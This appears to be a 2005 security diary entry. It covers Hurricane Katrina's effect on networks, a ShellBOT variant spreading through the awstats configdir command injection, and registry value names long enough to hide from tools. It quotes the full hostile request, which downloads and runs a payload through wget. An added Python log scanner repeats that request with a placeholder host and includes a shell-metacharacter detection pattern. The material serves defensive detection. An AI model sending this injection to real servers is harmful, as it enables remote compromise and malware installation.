Hurricane Katrina; ShellBOT/awstats; Long Registry Value Names

Published: 2005-08-29
Last Updated: 2005-09-13 13:31:48 UTC
by Erik Fichtner (Version: 1)

Hurricane Katrina

Our sympathies for those affected by Katrina. By all measures, this has been
an incredibly expensive storm, and it's not over yet. We're particularly
interested in reports of disaster preparedness and business continuity
actions that were taken, especially the ones that worked! Otherwise, stay
safe and stay dry.

Understandably, there haven't been very many reports of any kind out of the
area yet, but we have heard that there was an Internet2 link that went down
between Houston and Atlanta, which is being worked around.

http://loadrunner.uits.iu.edu/weathermaps/abilene/

Reader Wes Oden from Jackson, MS wrote in to let us know that he'd been up
until 5am preparing their office for the storm, and decided to turn the event into
an exercise in remote monitoring after the Governor issued a state of emergency
and requested that all residents stay off the roads. "We took non-critical servers
down to conserve battery power, and now all we can do is sit and wait for the
worst to come and hope the power stays up." We hope so, too.

New ShellBOT spreading via awstats.

We've gotten reports of a new variant of the ShellBOT trojan being spread
via the well-known awstats exploit. The hostile HTTP request is:

GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;
cd%20.a;wget%20http://fbi.php5.sk/qmail.tgz;tar%20-xzvf%20qmail.tgz;
cd%20qmail;./start;echo%20;echo| HTTP/1.1

This version brings an IRC server and an IRC client along for the ride to
implement some command and control channels, as well as an ELF file
infector (Linux.RST.b). We're interested in captures of this command and
control traffic.
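For sites reviewing their web server logs for this traffic, here is an added detection example in Python (not part of the ISC diary) that flags awstats.pl requests whose configdir parameter carries shell metacharacters and breaks the injected chain into its stages. The log lines are constructed, and the download host is replaced with the placeholder example.invalid.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines (not real traffic);
# the second line mirrors the request shape described in the diary.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Aug/2005:10:12:01 +0000] "GET /cgi-bin/awstats.pl?config=site&output=main HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.9 - - [29/Aug/2005:10:12:05 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://example.invalid/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1" 200 312 "-" "Mozilla/4.0"
192.0.2.3 - - [29/Aug/2005:10:12:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
"""

# Client IP, timestamp and request target from a common/combined log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+"')

# Characters that never belong in a legitimate configuration directory name.
SHELL_META = re.compile(r'[|;`$&<>]')

def parse_query(query):
    """Split a raw query string into decoded (name, value) pairs, '&'-separated only."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs

def detect_awstats_injection(line):
    """Return a finding dict for an awstats configdir injection attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.endswith("awstats.pl"):
        return None
    for name, value in parse_query(query):
        if name == "configdir" and SHELL_META.search(value):
            # Strip the pipe delimiters and split the ';'-chained commands for the analyst.
            stages = [s.strip() for s in value.strip("|").split(";") if s.strip()]
            return {"ip": m.group("ip"), "ts": m.group("ts"), "configdir": value, "stages": stages}
    return None

def scan(log_text):
    """Scan a whole log and return the list of findings."""
    return [f for f in map(detect_awstats_injection, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["ts"], finding["stages"])
```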

More on the overly long registry value name hiding problem:

An article over at PC-Welt (in German; use Babelfish if necessary) about which
products successfully handle long registry value names and which ones are partially
blinded by them leads us at the ISC to wonder if different language versions of
Windows 2000 and XP handle long registry value names differently. That could
explain some of the difficulty that various testers have had in validating which
tools work and which platforms are affected.

http://www.pcwelt.de/news/sicherheit/118750/index.html